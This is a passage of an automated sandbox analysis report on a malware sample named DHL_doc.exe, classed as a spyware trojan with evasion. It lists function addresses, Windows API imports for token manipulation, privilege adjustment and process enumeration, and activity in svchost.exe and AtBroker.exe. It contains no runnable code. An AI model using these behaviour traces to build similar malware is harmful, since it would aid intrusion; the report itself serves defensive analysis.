Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EB94C0 NtClose,	4_2_02EB94C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EB9420 NtDeleteFile,	4_2_02EB9420

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F2D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00F2D5EB

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F21201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00F21201

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F2E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00F2E8F6

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EC8060	0_2_00EC8060
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F32046	0_2_00F32046
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F28298	0_2_00F28298
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EFE4FF	0_2_00EFE4FF
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EF676B	0_2_00EF676B
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F54873	0_2_00F54873
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00ECCAF0	0_2_00ECCAF0
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EECAA0	0_2_00EECAA0
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EDCC39	0_2_00EDCC39
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EF6DD9	0_2_00EF6DD9
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EC91C0	0_2_00EC91C0
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EDB119	0_2_00EDB119
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE1394	0_2_00EE1394
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE1706	0_2_00EE1706
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE781B	0_2_00EE781B
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE19B0	0_2_00EE19B0
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00ED997D	0_2_00ED997D
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EC7920	0_2_00EC7920
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE7A4A	0_2_00EE7A4A
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE7CA7	0_2_00EE7CA7
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE1C77	0_2_00EE1C77
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EF9EEE	0_2_00EF9EEE
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F4BE44	0_2_00F4BE44
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE1F32	0_2_00EE1F32
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_024C3610	0_2_024C3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00618643	1_2_00618643
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0061687E	1_2_0061687E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00616883	1_2_00616883
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00610163	1_2_00610163
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0060E1E3	1_2_0060E1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006029F7	1_2_006029F7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0060224D	1_2_0060224D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00602250	1_2_00602250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00604225	1_2_00604225
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00602A00	1_2_00602A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0062EBC3	1_2_0062EBC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00602E80	1_2_00602E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0060FF43	1_2_0060FF43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0060FF3A	1_2_0060FF3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA352	1_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032003E6	1_2_032003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C02C0	1_2_031C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130100	1_2_03130100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C8158	1_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032001AA	1_2_032001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F41A2	1_2_031F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F81CC	1_2_031F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164750	1_2_03164750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313C7C0	1_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315C6E0	1_2_0315C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03200591	1_2_03200591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4420	1_2_031E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F2446	1_2_031F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EE4F6	1_2_031EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FAB40	1_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F6BD7	1_2_031F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320A9A6	1_2_0320A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314A840	1_2_0314A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03142840	1_2_03142840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031268B8	1_2_031268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E8F0	1_2_0316E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160F30	1_2_03160F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E2F30	1_2_031E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03182F28	1_2_03182F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4F40	1_2_031B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BEFA0	1_2_031BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132FC8	1_2_03132FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FEE26	1_2_031FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140E59	1_2_03140E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152E90	1_2_03152E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FCE93	1_2_031FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FEEDB	1_2_031FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DCD1F	1_2_031DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314AD00	1_2_0314AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03158DBF	1_2_03158DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313ADE0	1_2_0313ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140C00	1_2_03140C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0CB5	1_2_031E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130CF2	1_2_03130CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F132D	1_2_031F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312D34C	1_2_0312D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0318739A	1_2_0318739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031452A0	1_2_031452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315B2C0	1_2_0315B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315D2F0	1_2_0315D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E12ED	1_2_031E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320B16B	1_2_0320B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312F172	1_2_0312F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317516C	1_2_0317516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314B1B0	1_2_0314B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EF0CC	1_2_031EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031470C0	1_2_031470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F70E9	1_2_031F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF0E0	1_2_031FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF7B0	1_2_031FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03185630	1_2_03185630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F16CC	1_2_031F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7571	1_2_031F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DD5B0	1_2_031DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032095C3	1_2_032095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF43F	1_2_031FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03131460	1_2_03131460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFB76	1_2_031FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315FB80	1_2_0315FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B5BF0	1_2_031B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317DBF9	1_2_0317DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFA49	1_2_031FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7A46	1_2_031F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B3A6C	1_2_031B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DDAAC	1_2_031DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03185AA0	1_2_03185AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E1AA3	1_2_031E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EDAC6	1_2_031EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D5910	1_2_031D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03149950	1_2_03149950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315B950	1_2_0315B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AD800	1_2_031AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031438E0	1_2_031438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFF09	1_2_031FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03141F92	1_2_03141F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFFB1	1_2_031FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03103FD2	1_2_03103FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03103FD5	1_2_03103FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03149EB0	1_2_03149EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F1D5A	1_2_031F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03143D40	1_2_03143D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7D73	1_2_031F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315FDC0	1_2_0315FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B9C32	1_2_031B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFCF2	1_2_031FFCF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EBE4F6	4_2_04EBE4F6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC2446	4_2_04EC2446
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EB4420	4_2_04EB4420
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ED0591	4_2_04ED0591
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E10535	4_2_04E10535
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E2C6E0	4_2_04E2C6E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E0C7C0	4_2_04E0C7C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E10770	4_2_04E10770
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E34750	4_2_04E34750
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EA2000	4_2_04EA2000
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC81CC	4_2_04EC81CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ED01AA	4_2_04ED01AA
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC41A2	4_2_04EC41A2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E98158	4_2_04E98158
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E00100	4_2_04E00100
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EAA118	4_2_04EAA118
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E902C0	4_2_04E902C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EB0274	4_2_04EB0274
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ED03E6	4_2_04ED03E6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E1E3F0	4_2_04E1E3F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECA352	4_2_04ECA352
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E00CF2	4_2_04E00CF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EB0CB5	4_2_04EB0CB5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E10C00	4_2_04E10C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E0ADE0	4_2_04E0ADE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E28DBF	4_2_04E28DBF
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E1AD00	4_2_04E1AD00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EACD1F	4_2_04EACD1F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECEEDB	4_2_04ECEEDB
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E22E90	4_2_04E22E90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECCE93	4_2_04ECCE93
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E10E59	4_2_04E10E59
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECEE26	4_2_04ECEE26
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E02FC8	4_2_04E02FC8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E8EFA0	4_2_04E8EFA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E84F40	4_2_04E84F40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E52F28	4_2_04E52F28
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E30F30	4_2_04E30F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EB2F30	4_2_04EB2F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E3E8F0	4_2_04E3E8F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DF68B8	4_2_04DF68B8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E1A840	4_2_04E1A840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E12840	4_2_04E12840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E129A0	4_2_04E129A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EDA9A6	4_2_04EDA9A6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E26962	4_2_04E26962
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E0EA80	4_2_04E0EA80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC6BD7	4_2_04EC6BD7
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECAB40	4_2_04ECAB40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E01460	4_2_04E01460
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECF43F	4_2_04ECF43F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ED95C3	4_2_04ED95C3
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EAD5B0	4_2_04EAD5B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC7571	4_2_04EC7571
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC16CC	4_2_04EC16CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E55630	4_2_04E55630
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECF7B0	4_2_04ECF7B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC70E9	4_2_04EC70E9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECF0E0	4_2_04ECF0E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E170C0	4_2_04E170C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EBF0CC	4_2_04EBF0CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E1B1B0	4_2_04E1B1B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EDB16B	4_2_04EDB16B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E4516C	4_2_04E4516C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DFF172	4_2_04DFF172
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EB12ED	4_2_04EB12ED
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E2D2F0	4_2_04E2D2F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E2B2C0	4_2_04E2B2C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E152A0	4_2_04E152A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E5739A	4_2_04E5739A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DFD34C	4_2_04DFD34C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC132D	4_2_04EC132D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECFCF2	4_2_04ECFCF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E89C32	4_2_04E89C32
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E2FDC0	4_2_04E2FDC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC7D73	4_2_04EC7D73
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E13D40	4_2_04E13D40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC1D5A	4_2_04EC1D5A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E19EB0	4_2_04E19EB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DD3FD5	4_2_04DD3FD5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04DD3FD2	4_2_04DD3FD2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECFFB1	4_2_04ECFFB1
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E11F92	4_2_04E11F92
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECFF09	4_2_04ECFF09
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E138E0	4_2_04E138E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E7D800	4_2_04E7D800
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E19950	4_2_04E19950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E2B950	4_2_04E2B950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EA5910	4_2_04EA5910
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EBDAC6	4_2_04EBDAC6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E55AA0	4_2_04E55AA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EADAAC	4_2_04EADAAC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EB1AA3	4_2_04EB1AA3
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E83A6C	4_2_04E83A6C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECFA49	4_2_04ECFA49
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04EC7A46	4_2_04EC7A46
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E85BF0	4_2_04E85BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E4DBF9	4_2_04E4DBF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04E2FB80	4_2_04E2FB80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04ECFB76	4_2_04ECFB76
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EA1F00	4_2_02EA1F00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E9CE40	4_2_02E9CE40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E9CE37	4_2_02E9CE37
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E9B0E0	4_2_02E9B0E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E9D060	4_2_02E9D060
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02E91122	4_2_02E91122
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EA3780	4_2_02EA3780
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EA377B	4_2_02EA377B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EA5540	4_2_02EA5540
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_02EBBAC0	4_2_02EBBAC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CF5435	4_2_04CF5435
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CEE64C	4_2_04CEE64C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CED718	4_2_04CED718
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CEE194	4_2_04CEE194
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CEE2B3	4_2_04CEE2B3
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CEC9D8	4_2_04CEC9D8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CEC944	4_2_04CEC944
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4_2_04CF593D	4_2_04CF593D

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04E57E54 appears 107 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04DFB970 appears 262 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04E8F290 appears 103 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04E7EA12 appears 86 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04E45130 appears 58 times
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: String function: 00EDF9F2 appears 31 times
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: String function: 00EE0A30 appears 46 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03187E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0312B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03175130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 031AEA12 appears 86 times

Source: DHL_doc.exe, 00000000.00000003.1705548536.00000000043F3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_doc.exe
Source: DHL_doc.exe, 00000000.00000003.1706019842.000000000473D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_doc.exe

Source: DHL_doc.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/10

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F337B5 GetLastError,FormatMessageW,

0_2_00F337B5

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F210BF AdjustTokenPrivileges,CloseHandle,		0_2_00F210BF
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00F216C3

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00F351CD

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F4A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00F4A67C

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F3648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00F3648E

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EC42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00EC42A2

Source: C:\Users\user\Desktop\DHL_doc.exe

File created: C:\Users\user\AppData\Local\Temp\subpredication

